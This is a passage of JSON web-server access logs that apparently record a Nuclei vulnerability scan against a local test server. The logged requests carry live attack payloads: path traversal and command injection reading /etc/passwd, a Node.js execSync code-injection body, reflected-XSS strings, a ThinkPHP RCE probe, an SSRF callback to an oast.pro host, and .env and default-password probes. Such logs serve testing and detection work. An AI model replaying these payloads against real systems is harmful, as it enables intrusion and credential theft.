"http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"{\x22email\x22:\x22invalid\x22,\x22signUpContext\x22:{},\x22secondaryEmail\x22:\x22\x22,\x22usingNewUi\x22:true}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servicedesk/customer/user/signup HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=nuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"DELETE /actuator/gateway/routes/29KBxW7u9EpigN8kSIzOauFnkQy HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"DELETE", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dbaas_monitor/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/1-flash-gallery/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats/awredir.pl?url=example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}\x22}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=bnVjbGVp&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.127.0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/servlets/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS /api/v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wow-company&tab=http://ca28bc0smpvbbtig07h0bakr8t91xjtin.oast.pro/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F29KBxhtP1RnEjx6svJuF3nIkk3N.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /checkValid HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /network-login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/awstats/awredir.pl?url=example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/wp-content/plugins/1-flash-gallery/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccm/system/panels/page/preview_as_user/preview?cID=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/.env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/jsp/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS /api/v2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/sling/loginstatus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/css/29KBxhtP1RnEjx6svJuF3nIkk3N.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /metrics/v1/mbeans HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s=set&_method=__construct&method=*&filter[]=system HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/systemcall.php?command=cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/websocket/index.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/sling/loginstatus.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"Login=admin&Password=12345&Action=AdminLogin&XToken={{token}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?/Ajax/&q[]=/0/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/users/search_authors HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dfshealth.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /password.jsn HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kylin/api/admin/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gallery/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"http:","request":"GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) 